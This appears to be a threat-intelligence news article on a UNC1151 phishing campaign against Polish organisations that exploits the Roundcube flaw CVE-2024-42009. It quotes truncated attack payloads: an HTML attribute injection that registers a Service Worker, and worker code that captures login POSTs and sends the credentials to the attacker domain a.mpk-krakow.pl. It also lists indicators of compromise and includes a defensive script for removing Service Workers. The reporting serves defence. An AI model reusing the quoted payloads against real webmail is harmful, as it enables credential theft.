A highly targeted spear phishing campaign has struck Polish organizations this week, leveraging a known Roundcube webmail vulnerability (CVE-2024-42009) to compromise user accounts and steal credentials.
The operation, attributed with high confidence to the UNC1151 threat actor cluster, which Mandiant and Google link to Belarusian or Russian intelligence, highlights the evolving sophistication of credential theft in modern cyber espionage campaigns.
Exploiting CVE-2024-42009 in Roundcube
The campaign begins with a compelling phishing email, purporting to be an urgent invoice request associated with a reservation number. Simply opening the email in a vulnerable Roundcube installation was sufficient for exploitation; no additional user interaction was needed.
CVE-2024-42009 is an HTML sanitization flaw in Roundcube, the popular browser-based email client. This bug allows attackers to smuggle malicious JavaScript into the victim’s browser context via specially crafted email messages.
Since webmail clients like Roundcube must balance the ability to display HTML emails with the need to block dangerous scripting, sanitization routines are critical and, as this campaign shows, often bypassed by new tricks.
Malicious Payload and Credential Theft
The attack’s technical backbone is a two-stage JavaScript payload. Upon exploiting the vulnerability, the attack code first registers a Service Worker on the victim’s browser—a rarely abused browser feature designed for background tasks and offline support, but here weaponized for credential theft.
Initial Exploit: Service Worker Registration
```xml
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes; animation-duration: 1s;
onanimationstart=d=document.querySelector('#attachment-list');if(d)d.style.display='none';n=navigator;
u=d?.querySelector('a').href;if(u)n.serviceWorker.register(u) (...)
```
This code executes as soon as the email is opened, silently registering a malicious Service Worker that persists in the browser.
Credential Harvesting: Intercepting Login Attempts
```js
self.addEventListener('fetch', event => {
  (...)
  if (req.method === 'POST') {
    const cloned = req.clone();
    cloned.text().then(bodyText => {
      const params = new URLSearchParams(bodyText);
      const user = params.get('username') || params.get('_user');
      const pass = params.get('password') || params.get('_pass');
      fetch('https://a.mpk-krakow.pl/creds', {
        body: JSON.stringify({ login: user, password: pass }),
        (...)
```
After the Service Worker is installed, the victim is redirected to their organization’s legitimate webmail login page.
As users enter their credentials, the malicious Service Worker intercepts the POST request, captures the login data, and exfiltrates it to an attacker-controlled server (a.mpk-krakow[.]pl). Because the interception happens inside the browser, the attackers obtain the credentials even though the user is submitting them to the real, legitimate login form.
New Roundcube Vulnerability and Attack Chain Potential
This week also saw the disclosure of CVE-2025-49113, a fresh Roundcube vulnerability enabling authenticated attackers to execute code on the server and potentially take over the entire webmail instance.
While this new flaw has not yet been observed in the wild, CERT Polska warns that combining such server-side vulnerabilities with client-side credential theft could create devastating attack chains: first stealing credentials, then pivoting to full server compromise.
Recommendations and Indicators of Compromise
All organizations running Roundcube are urged to:
- Patch to the latest version (1.6.11 or 1.5.10 as of June 2025).
- Review network logs for connections to a.mpk-krakow[.]pl.
- Reset passwords for affected users and verify recent account activity.
- Remove malicious Service Workers via browser developer tools.
- Report incidents to the appropriate national CSIRT.
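As an added example for the Service Worker clean-up step above (not code from the CERT Polska advisory or from Roundcube), the following helper lists the Service Worker registrations on a webmail origin and unregisters any whose script is not on an allow-list. The hostname `webmail.example.org`, the empty allow-list, and the `_task=mail&_action=get` attachment-download heuristic are assumptions.

```javascript
// Added example (not from the advisory): audit the Service Worker registrations
// on a webmail origin and unregister any whose script is not on an allow-list.
// Assumption: the deployment registers no Service Worker of its own, so the
// allow-list starts empty and every registration found is suspect.
const ALLOWED_SCRIPT_PREFIXES = [];

// Assumption: a worker script fetched through the webmail's attachment-download
// endpoint mirrors the abuse above, where the payload registers the worker
// from an attachment link's href.
function looksLikeAttachmentWorker(scriptURL) {
  try {
    const q = new URL(scriptURL).searchParams;
    return q.get('_task') === 'mail' && q.get('_action') === 'get';
  } catch {
    return false;
  }
}

// Split registration-like objects ({ scope, active|waiting|installing: { scriptURL } })
// into ones to keep and ones to remove; each entry notes whether it looks attachment-served.
function classifyRegistrations(registrations, allowedPrefixes) {
  const keep = [];
  const remove = [];
  for (const reg of registrations) {
    const worker = reg.active || reg.waiting || reg.installing;
    const scriptURL = worker ? worker.scriptURL : '';
    const entry = { reg, scope: reg.scope, scriptURL, attachmentLike: looksLikeAttachmentWorker(scriptURL) };
    (allowedPrefixes.some(p => scriptURL.startsWith(p)) ? keep : remove).push(entry);
  }
  return { keep, remove };
}

// Browser entry point: paste into the DevTools console on the webmail origin.
// Returns null outside a browser, otherwise a report of what was unregistered.
async function auditServiceWorkers(allowedPrefixes = ALLOWED_SCRIPT_PREFIXES) {
  if (typeof navigator === 'undefined' || !navigator.serviceWorker) return null;
  const regs = await navigator.serviceWorker.getRegistrations();
  const { keep, remove } = classifyRegistrations(regs, allowedPrefixes);
  for (const e of remove) await e.reg.unregister();
  return { kept: keep.length, removed: remove.map(({ scope, scriptURL, attachmentLike }) => ({ scope, scriptURL, attachmentLike })) };
}

// Constructed sample registrations on a hypothetical webmail host, for offline use.
const SAMPLE_REGISTRATIONS = [
  { scope: 'https://webmail.example.org/', active: { scriptURL: 'https://webmail.example.org/sw.js' } },
  { scope: 'https://webmail.example.org/', active: { scriptURL:
      'https://webmail.example.org/?_task=mail&_action=get&_uid=42&_mbox=INBOX&_part=2' } },
];
```

Unregistering removes the interception for future logins only; credentials already submitted through a flagged worker should be treated as compromised and reset.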
Key IoCs from this campaign:
- irina.vingriena@gmail[.]com – sender address
- julitaszczepanska38@gmail[.]com – sender address
- 2001:67c:e60:c0c:192:42:116:216 – SMTP source address
- [!WAZNE] Faktura do numeru rezerwacji: S2500650676 – email subject
- 70cea07c972a30597cda7a1d3cd4cd8f75acad75940ca311a5a2033e6a1dd149, Delivery report – SHA-256 and name of attached JS file
- a.mpk-krakow[.]pl – credential harvesting domain used by the attacker
This campaign marks a clear escalation in the use of browser-based webmail vulnerabilities combined with advanced phishing and credential-harvesting techniques.
The rapid exploitation of newly discovered flaws, now potentially in both client and server contexts, underscores the necessity of rapid patching, vigilant monitoring, and coordinated defense among targeted organizations and national CSIRTs.
As threat actors like UNC1151 continue to innovate, the security community must remain agile and informed to defend against the next wave of attacks.